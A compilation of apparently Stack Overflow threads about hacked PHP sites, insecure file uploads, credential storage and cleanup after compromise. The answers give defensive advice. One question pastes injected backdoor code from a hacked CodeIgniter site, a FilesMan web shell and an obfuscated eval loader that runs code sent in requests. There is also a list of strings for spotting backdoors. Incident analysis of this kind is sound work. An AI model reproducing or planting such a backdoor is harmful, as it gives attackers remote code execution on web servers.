PHP security issue - file uploads

One of my clients approached me to check and fix a hacked site. The site was developed by another developer, a very inexperienced one who hadn't taken care of even basic security.
The problem was that somehow PHP files were written to the images folder. The hackers also wrote an index.html which displays "site is hacked". When I checked, the images folder had 777 permissions, so I came to the rough conclusion that it was because of the folder permissions. The hosting support guy says that some PHP file has a poorly written script which allowed files with any extension to be uploaded to the server, and that the hackers then executed those files to gain access or do whatever they wanted.
I have a few questions:
Is it only through upload functionality that other PHP files can be uploaded to the server?
Is there no other way to write files remotely, given that the folder permissions are 777?
The site has some FCKeditor instances and a couple of upload functionalities. I checked them and there are enough validations; when files with extensions other than images or PDF are uploaded, they just return false.
Doesn't setting the folder permissions to a lower level fix the issue?
I asked the support guy to change the folder permissions, saying that would solve the issue, but he says there is some PHP file through which the other PHP files were written, and he wants that fixed, otherwise the site cannot go live. He says that even if the folder permissions are changed, the hacker can change them back to 777 and execute whatever he wants, because of that poorly written PHP file.
How should I approach finding whether there is such a PHP file? Any help or pointers would be much appreciated.

777 means that any user on the system (with execute access for all the parent directories, anyway) can add anything to that directory. Web users are not system users, though, and most web servers (Apache included) won't let random clients write files there right out of the box. You'd have to specifically tell the server to allow that, and I'm fairly certain that's not what happened.
If you're allowing any file uploads, though, the upload folder needs to at least be writable by the web server's user (or the site's, if you're using something like suPHP). And if the web server can write to that directory, then any PHP code can write to that directory. You can't set permissions high enough to allow uploads and low enough to keep PHP code from running, short of making the directory write-only (which makes it pretty useless for fckeditor and such).
The compromise almost certainly happened because of a vulnerability in the site itself. Chances are, either there's a file upload script that's not properly checking where it's writing to, or a script that blindly accepts a name of something to include. Since the PHP code typically runs as the web server's user, it has write access to everything the web server has write access to. (It's also possible that someone got in via FTP, in which case you'd better change your passwords. But the chances of the web server being at fault are slim at best.)
As for what to do at this point, the best option is to wipe the site and restore from backup -- as has been mentioned a couple of times, once an attacker has gotten arbitrary code to run on your server, there's not a whole lot you can trust anymore. If you can't do that, at least find any files with recent modification times and delete them. (Exploits hardly ever go through that much trouble to cover their tracks.)
Either way, then set the permissions on any non-upload, non-temp, non-session directories -- and all the existing scripts -- to disallow writes, period...particularly by the web server. If the site's code runs as the same user that owns the files, you'll want to use 555 for directories and 444 for files; otherwise, you can probably get by with 755/644. (A web server would only be able to write those if it's horribly misconfigured, and a hosting company that incompetent would be out of business very quickly.)
Frankly, though, the "support guy" has the right idea -- I certainly wouldn't let a site go live on my servers knowing that it's going to be executing arbitrary code from strangers. (Even if it can't write anything to the local filesystem, it can still be used to launch an attack on other servers.) The best option for now is to remove all ability to upload files. It's obvious that someone has no idea how to handle file uploads securely, and now that someone out there knows you're vulnerable, chances are you'd keep getting hacked anyway till you find the hole and plug it.
As for what to look for...unfortunately, it's somewhat vague, as we're talking about concepts above the single-statement level. Look for any PHP scripts that either include, require, or write to file names derived in any way from $_GET, $_POST, or $_COOKIE.
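For illustration only, here is a hypothetical example of the kind of pattern to grep for, and a safer equivalent (the parameter name and page list are made up):
<?php
// What to look for (hypothetical vulnerable pattern -- do NOT use):
//   include($_GET['page'] . '.php');
// An attacker can point that at an uploaded file or, with allow_url_include, a remote URL.

// Safer equivalent: map request values to a fixed whitelist of known files.
$pages = array('home' => 'home.php', 'contact' => 'contact.php');
$key   = isset($_GET['page']) ? $_GET['page'] : 'home';
include __DIR__ . '/pages/' . (isset($pages[$key]) ? $pages[$key] : 'home.php');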

Changing folder permissions won’t solve the issue unless you’re using CGI, since PHP probably needs to be able to write to an upload folder, and your web server probably needs to be able to read from it. Check the extension of any uploaded files!
(So no, 0777 permissions don’t mean that anyone can upload anything.)

As cryptic mentioned, once a hacker can run code on your server then you have to assume that all files are potentially dangerous. You should not try to fix this yourself - restoring from a backup (either from the client or the original developer) is the only safe way around this.
Once you have the backup files ready, delete everything on your site and upload the backup - if it is a shared host you should contact them as well in case other files are compromised [rarely happens though].

You've identified two issues: the permissions and the lack of extension checking. However, do you have any evidence that these were the means by which the system was compromised? You've not provided anything to support that assertion.
Changing the permissions to something more restrictive would have provided NO PROTECTION against users uploading malicious PHP scripts.
Checking the extensions of files might have made it a bit more difficult to inject PHP code into the site, but it WOULD NOT PREVENT IT.
Restoring from backup might remove the vandalized content but WILL NOT FIX THE VULNERABILITIES in the code.
You don't have the skills your client (who is probably paying you for this) needs to resolve this. And acquiring those skills is a much longer journey than reading a few answers here (although admittedly it's a start).

Is it only through upload functionality that other PHP files can be uploaded? Is there no other way to write files remotely, given that the folder permissions are 777?
There definitely are multiple possible ways to write a file in the web server’s document root directory. Just think of HTTP’s PUT method, WebDAV, or even FTP that may be accessible anonymously.
The site has some FCKeditor instances and a couple of upload functionalities. I checked them and there are enough validations; when files with extensions other than images or PDF are uploaded, they just return false.
There are many things one can do wrong when validating an uploaded file. Trusting the reliability of information the client sent is one of the biggest mistakes one can make. This means it doesn't suffice to check whether the client says the uploaded file is an image (e.g. one of image/…). Such information can be easily forged. And even proper image files can contain PHP code that is executed when interpreted by PHP, whether it's in an optional section like a comment or in the image data itself.
Doesn't setting folder permissions to a lower level fix the issue?
No, probably not. The upload directory must be writable by PHP's process and readable by the web server's. Since both are probably the same, and executing a PHP file requires only read permission, any uploaded .php file is probably also executable. The only solution is to make sure that the stored files don't have an extension that denotes a file type executed by the web server, i.e. make sure a PNG is actually stored as .png.
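To make that concrete, here is a minimal sketch of an upload handler along those lines. It assumes a form field named "upload" and a writable "uploads/" directory (both made up; adjust to your setup). The point is that the type check and the stored file name come from the server, never from the client:
<?php
// Whitelist of content types (detected server-side) mapped to safe extensions.
$allowed = array(
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'image/gif'       => 'gif',
    'application/pdf' => 'pdf',
);

if (!isset($_FILES['upload']) || $_FILES['upload']['error'] !== UPLOAD_ERR_OK) {
    die('Upload failed');
}

// Inspect the file contents, not the client-supplied name or MIME type.
$finfo = new finfo(FILEINFO_MIME_TYPE);
$type  = $finfo->file($_FILES['upload']['tmp_name']);

if (!isset($allowed[$type])) {
    die('File type not allowed');
}

// Generate the stored name ourselves with a whitelisted extension,
// so nothing ending in .php can ever land in the upload directory.
$name = md5(uniqid(mt_rand(), true)) . '.' . $allowed[$type];
move_uploaded_file($_FILES['upload']['tmp_name'], __DIR__ . '/uploads/' . $name);
echo 'Stored as ' . $name;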

Related

Codeigniter application getting hacked, code injected in index.php

I have a CodeIgniter 2.0.2 project that keeps getting hacked. There are two main issues:
Malicious code is being added to the start of the index.php file
Rogue files are added to the server
According to the host there are no FTP logs to indicate these files were uploaded.
As there are no FTP upload logs related to the rogue files - does this mean it must be an exploit via the site itself e.g. a contact or upload form?
The site is on shared hosting - could it be that a site on the same server is also getting hacked and this is causing the problems?
Would it help if I change the filename of index.php to something else?
As the index.php is getting modified should I CHMOD it to 644?
I've been looking for the suggested permissions for CodeIgniter projects but haven't found any yet. I was thinking 644 across the site apart from the upload/logs directories (777) - does this sound okay?
Code injected to the top of the index.php file:
<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-
which is then followed by a long preg_replace statement with a long encoded string. This is followed by a second statement:
if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}
There is a contact form and a form where a user can upload items using CKFinder 2.0.1. Going to update this and see if that resolves it.
There's a couple of things you can do:
Check your logfiles for POST requests to files with weird or unfamiliar names, e.g. .cache_123.php - these could be backdoor scripts, especially filenames starting with a dot, thus hiding it from the (regular) filesystem.
Download the complete live site and do a site-wide search for things such as base64_decode, exec, preg_replace, passthru, system, shell_exec, eval, FilesMan (a quick scanner sketch follows after this list)
Have your entire (downloaded live) site checked by running it through anti-virus software (AVG, Avast, ...)
Chmod upload directories 775 instead of 777 if possible
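If you'd rather do that site-wide search with PHP itself (handy on hosts without shell access), something like this rough scanner will do. The starting path and the pattern list are assumptions, and expect false positives, since legitimate code also uses these functions:
<?php
// Flag PHP files containing strings commonly found in injected backdoors.
$suspicious = array('base64_decode', 'gzinflate', 'str_rot13', 'shell_exec',
                    'passthru', 'FilesMan', 'eval(');
$iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('.'));
foreach ($iter as $file) {
    if (!$file->isFile() || substr($file->getFilename(), -4) !== '.php') {
        continue;
    }
    $code = file_get_contents($file->getPathname());
    foreach ($suspicious as $needle) {
        if (strpos($code, $needle) !== false) {
            echo $file->getPathname() . ' contains ' . $needle . "\n";
        }
    }
}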
I know this is an old thread, but I'd like to add an option to figure out what and where the problem is occurring.
Create a hook which loads each time (doesn't matter at which stage) and dump the $this->input->post() and ->get() to a log file together with the classname and method name.
This way you will see quick enough where the problem started.
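For what it's worth, a rough sketch of such a hook in CodeIgniter 2.x might look like the following. The class name, file names and log path are made up, and hooks must be enabled with $config['enable_hooks'] = TRUE:
// application/config/hooks.php
$hook['post_controller_constructor'] = array(
    'class'    => 'RequestLogger',
    'function' => 'log_request',
    'filename' => 'RequestLogger.php',
    'filepath' => 'hooks',
);

// application/hooks/RequestLogger.php
class RequestLogger {
    public function log_request()
    {
        $CI =& get_instance();
        // On CI 2.0.x, post()/get() without arguments may not return the full
        // array; fall back to $_POST/$_GET directly if that is the case.
        $line = date('c') . ' '
              . $CI->router->fetch_class() . '::' . $CI->router->fetch_method()
              . ' GET='  . json_encode($CI->input->get())
              . ' POST=' . json_encode($CI->input->post()) . "\n";
        // Ideally write somewhere outside the web root.
        file_put_contents(APPPATH . 'logs/requests.log', $line, FILE_APPEND);
    }
}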
I think it is far easier to hack through a PHP app than through an FTP server. Do you have any upload forms? If you can't go with a VPS, try asking your host to move it to another shared server.
I think you really need to perform a code audit to find where the core vulnerability lies. Unless you run some sort of integrity checks, you can't be sure whether the attacker has put a backdoor in other files.
As a quick fix, I would suggest you to install ModSecurity Apache module if possible. Next, look for places in code where file injection could occur (usually file upload functions).

Securing Uploaded Files (php and html)

I have a simple site which allows users to upload files (among other things obviously). I am teaching myself php/html as I go along.
Currently the site has the following traits:
--When users register, a folder is created in their name.
--All files the user uploads are placed in that folder (with a time stamp added to the name to avoid any issues with duplicates).
--When a file is uploaded information about it is stored in an SQL database.
simple stuff.
So, now my question is what steps do I need to take to:
A. Prevent Google from archiving the uploaded files.
B. Prevent users from accessing the uploaded files unless they are logged in.
C. Prevent users from uploading malicious files.
Notes:
I would assume that B would automatically achieve A. I can restrict users to only uploading files with .doc and .docx extensions. Would this be enough to guard against C? I would assume not.
There is a number of things you want to do, and your question is quite broad.
For the Google indexing, you can work with /robots.txt. You did not specify whether you also want to apply an ACL (Access Control List) to the files, so that might or might not be enough. Serving the files through a script might work, but you have to be very careful not to use include, require or similar things that might be tricked into executing code. You instead want to open the file, read it and serve it through file operation primitives.
Read about "path traversal". You want to avoid that, both in upload and in download (if you serve the file somehow).
The definition of "malicious files" is quite broad. Malicious to whom? You could run an antivirus on the upload, for instance, if you are worried about your site being used to distribute malware (you should be). If you want to make sure that people can't harm the server, you have to at the very least make sure they can only upload a limited set of filetypes. Checking extensions and MIME type is a beginning, but don't trust that (you can embed code in a PNG and it's valid if it's included via include()).
Then there is the problem of XSS, if users can upload HTML contents or stuff that gets interpreted as such. Make sure to serve a content-disposition header and a non-html content type.
That's a start, but as you said there is much more.
Your biggest threat is going to be if a person manages to upload a file with a .php extension (or some other extension that results in server side scripting/processing). Any code in the file runs on your server with whatever permissions the web server has (varies by configuration).
If the end result of the uploads is just that you want to be able to serve the files as downloads (rather than let someone view them directly in the browser), you'd be well off to store the downloads in a non web-accessible directory, and serve the files via a script that forces a download and doesn't attempt to execute anything regardless of the extension (see http://php.net/header).
This also makes it much easier to facilitate only allowing downloads if a person is logged in, whereas before, you would need some .htaccess magic to achieve this.
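A minimal sketch of such a download script, assuming the files live in a directory outside the document root and that is_logged_in() stands in for whatever session check the site actually uses (both are placeholders):
<?php
if (!is_logged_in()) {                       // placeholder for your real auth check
    header('HTTP/1.1 403 Forbidden');
    exit('Not allowed');
}

$storage = '/home/example/private_uploads/'; // outside the web root (illustrative path)
$name    = isset($_GET['file']) ? basename($_GET['file']) : ''; // basename() strips ../ tricks
$path    = $storage . $name;

if ($name === '' || !is_file($path)) {
    header('HTTP/1.1 404 Not Found');
    exit('No such file');
}

// Force a download; never let the server try to interpret or execute the file.
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;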
You should not upload to directories served by the webserver if you do not want the files to be directly available.
I suggest you use X-Sendfile, which is a header that instructs the server to send a file to the user. Your PHP script called 'fetch so-and-so file' would do whatever authentication you have in place (I assume you have something already) and then return the header. So long as the web server can access the file, it will then serve the file.
See this question: Using X-Sendfile with Apache/PHP
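With mod_xsendfile installed and an XSendFilePath directive covering the storage directory, the PHP side reduces to roughly the following (the auth check and path are placeholders; error handling omitted for brevity):
<?php
if (!is_logged_in()) {                        // placeholder auth check
    header('HTTP/1.1 403 Forbidden');
    exit;
}
$file = '/home/example/private_uploads/' . basename($_GET['file']);
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
header('X-Sendfile: ' . $file);               // Apache streams the file from here on
exit;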

Is it a security risk to have your database details in a php file accessible via the browser?

I've just had an argument with a colleague.
My index.php contains my MySQL connection and therefore also the host, username, password and database name.
He claims it is a security threat, because the possibility exists that the PHP parser may fail, which would cause the webserver to return the entire file as plain text.
I, however, believe that IF the PHP parser were to fail, the webserver would give the users an internal server error.
Can anyone confirm whether it is or is not a security risk?
thank you.
The short answer is no.
The long answer is yes, but only if:
your server's been compromised, in which case people reading your php files are the least of your worries
you've misconfigured your server to serve .php files as plain text, which would be very silly indeed.
Also, if you're using some kind of version control software, make sure your .hg or .svn or whatever folders can't be viewed from a web browser. You'd be surprised how often that happens.
EDIT:
I would be inclined to go with some of the suggestions on here already, which is what I do in my day to day development. Have a config.php file outside of your web root folder and include this in your index.php. That way you know for sure it's never going to be viewable. Btw, I've been developing in PHP for a number of years and have never had the parser fail in such a way that it's resulted in raw PHP being displayed to an end user.
EDIT 2:
If your colleague is referring to parse errors when he talks about the PHP parser "failing" then in a live environment you should have error reporting disabled anyway.
Either outcome is a possibility. The normal course of action is to use require to bring in a separate file containing your db credentials. That file should be outside the webserver file tree so it can't be reached via a browser.
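A minimal sketch of that layout, with made-up paths (the config file sits one level above public_html so the browser can never request it, but PHP can still require it):
<?php
// /home/example/config.php -- outside the document root
return array(
    'db_host' => 'localhost',
    'db_name' => 'mydb',
    'db_user' => 'dbuser',
    'db_pass' => 'secret',
);

<?php
// /home/example/public_html/index.php
$config = require __DIR__ . '/../config.php';   // reachable by PHP, not by the browser
$mysqli = new mysqli($config['db_host'], $config['db_user'],
                     $config['db_pass'], $config['db_name']);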
I'm of the belief that you can never be too safe. What's easier: replacing thousands, possibly millions, of records if a hacker gets your DB information, and the security breach you would have to explain to your users (and possibly their lawyers, depending on the content and the breach), or putting your DB information in a separate, protected folder and including it on the pages where you need the connection?
To me, the choice is simple.
Your co-worker is correct but this is very unlikely to happen. The .php file will only be returned as plain text or as a download if PHP has stopped running on the host.
To be safer, include() the database credentials from a file in a new folder. In that folder, have a .htaccess file with 'deny from all'.
That way, even if PHP stops running on the server, Apache will still run and protect all the files, including the database credentials. If even Apache stops running, the whole webserver will be unreachable and your credentials will still be safe.
:)
Personally I'd put the options in a config file outside the web tree and, once uploaded, remove FTP access from that directory. It's not just a matter of whether the PHP parser fails and drops the file out as plain text; if the FTP server has a vulnerability that gets compromised, that file could be accessed via FTP as well as HTTP.
As long as Apache/PHP is running as a separate user to FTP you can still require the config file from PHP.

All PHP files getting hacked

Like always, just want to say thank you for all of the help and input in advance.
I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail.
The code that is added looks like this - eval(base64_decode(string)) - where the string is 3024 characters long.
Not sure if anyone else has run into this problem or if anyone has ideas on how I can secure my PHP code.
Thanks again.
The server itself could be compromised. Report the problem to your web host. What is their response?
An insecure PHP script coupled with incorrect file permissions could give the attacker the ability to modify your PHP files. To eliminate this possibility I would take the site down, delete all the files, re-upload, then switch permissions on the entire site to deny any writes to the file system.
Edit:
As a short-term fix try asking your web host to disable eval() for your account. If they're worth their salt they should be running Suhosin which has an option to disable eval.
As a first measure, add dangerous functions such as exec to disable_functions in your php.ini. Note that eval() is a language construct rather than a function, so disable_functions won't block it (that's what the Suhosin option mentioned above is for), and disable_functions can only be set in php.ini, not in .htaccess.
Yes, I have run into this problem myself. I take it you are on a shared host? Are you perchance on Rackspace Cloud?
That is where I had the problem. The first thing you need to do right away is notify your host; this is a hosting issue, and I suspect the malware has gained access to your server at the FTP level.
Make sure you have nothing chmodded 777 (world-writable); if it needs to be writable by your app, make it 775.
Hope this helps, good luck.
You should change the file permissions so that only you can write to those files. 0777 (the default on some hosts, I believe) is just asking for trouble. See File Permissions.
Also, it's advisable to put any files that aren't supposed to be accessible by URL, for example config files, outside of the public_html folder.
I had a similar problem. However, my problem was that I was running a Python code evaluator on my site. As far as I remember, you need to use the eval() function to execute the Python code. In one of my PHP files I had a weird eval statement. What kind of script are you developing? I mean, does it involve evaluation of some other code?
You should also note (assuming you are using a hosting solution to host your site) that it's almost never your fault. As an example, the Network Solutions hosting company recently had a server hacked and over 1K webpages were affected, not due to security holes in each particular site, but due to bad configuration/monitoring of what was put on the particular server that hosts those sites. If you can't see anything security-wise wrong with your code, i.e. you sanitize everything properly and/or you are running a non-vulnerable version of whatever CMS you are using (if you're using a CMS), then it's probably not an issue with your site, just the server in general.
You should move to another server. It would appear that the attacker has access to the server or is running some code as a background process which is overwriting the files. It may be possible to identify and remove the problem, but smart attackers will hide additional scripts etc to trip you up later.
I've come across viruses that read FileZilla config files.
I swear to god. At first I was: WOW; then I was: mother f*** sneaky b*stards.
Check your PC for viruses.
One of the possible scenarios is that somebody managed to get write access somehow and changing passwords etc. helped, but he left a php file that can still run.
See if there are any unknown files there. Or delete every damn thing and restore some backups.
Get the last modified time of your files, then go over to your access logs (FTP, HTTP, whatever's open; if you don't know where they are, ask your host) and find out who was mucking around on your system at that time.
Likely the attacker has installed a script that they can call periodically to re-infect any files you fix.
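If you want to do that first pass from PHP (for example when you only have web access), a quick sketch along these lines will list recently changed files so you can compare the timestamps against your logs; the starting directory and the seven-day window are arbitrary assumptions:
<?php
$root   = '.';                     // start at the site root (adjust as needed)
$window = 7 * 24 * 3600;           // files modified within the last 7 days
$now    = time();
$iter = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root));
foreach ($iter as $file) {
    if ($file->isFile() && ($now - $file->getMTime()) < $window) {
        echo date('Y-m-d H:i:s', $file->getMTime()) . '  ' . $file->getPathname() . "\n";
    }
}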

deny access to certain folder using php

Is it possible to "deny from all" Apache .htaccess style using PHP?
I can't use .htaccess because I'm using a different webserver, so I want to use PHP to work around it.
So let's say a user is trying to access a folder named 'david'; all its content and subdirectories should be denied from viewing.
No.
PHP cannot be used to protect folders, because it is not PHP that serves requests, but the web server.
You can move the directory above the document root to prevent web access to it.
But permissions will not help you at all.
Use chmod to change the permissions on that directory. Note that the user running PHP needs to own it in that case.
If you just want to prevent indexing the folder, you can create an index.php file that does a simple redirection. Note: Requests that have a valid filename will still be let through.
<?php
header("Location: /"); // redirect user to root directory
exit; // stop the script so nothing else is output after the redirect
Without cooperation from the webserver the only way to protect your files is
to encrypt them, in an archive maybe, of which your script would know the password and tell no one - that will end up wasting CPU, as the server will be decrypting it all the time, or
to use an incredibly deranged file naming scheme, a file naming scheme you won't ever describe to anyone, and that only your PHP script can sort through.
Still, data could be downloaded, bandwidth could go to waste, and encrypted files could be decrypted.
It all depends on how much that data matters. And how much your time costs, as these convoluted layers of somewhat penetrable obfuscation will likely eat huge chunks of developer time.
Now, as I said... that would be without cooperation from the webserver... but what if the webserver is cooperating and doesn't know?
I've seen some Apache webservers, for instance (can anyone confirm it's in the standard distribution?), come preloaded with a rule denying access to files starting with .ht -- not only .htaccess but everything similar: .htproxy, .htcache, .htwhatever_comes_to_mind, .htyourmama...
Chances are your server could be one of those.
If that's the case... rename your hidden files .hthidden-<filename1>, .hthidden-<filename2>... and you'll get access to them only through PHP file functions, like readfile().
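A tiny sketch of that idea, with an entirely made-up name mapping: only the PHP script knows which obfuscated .ht-prefixed file corresponds to which public name, and the web server refuses to serve the .ht* files directly while PHP can still read them.
<?php
$map = array(
    'report.pdf' => '.hthidden-8f3a91c2-report.pdf',  // invented obfuscated name
);
if (!isset($_GET['file']) || !isset($map[$_GET['file']])) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $_GET['file'] . '"');
readfile(__DIR__ . '/files/' . $map[$_GET['file']]);
exit;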
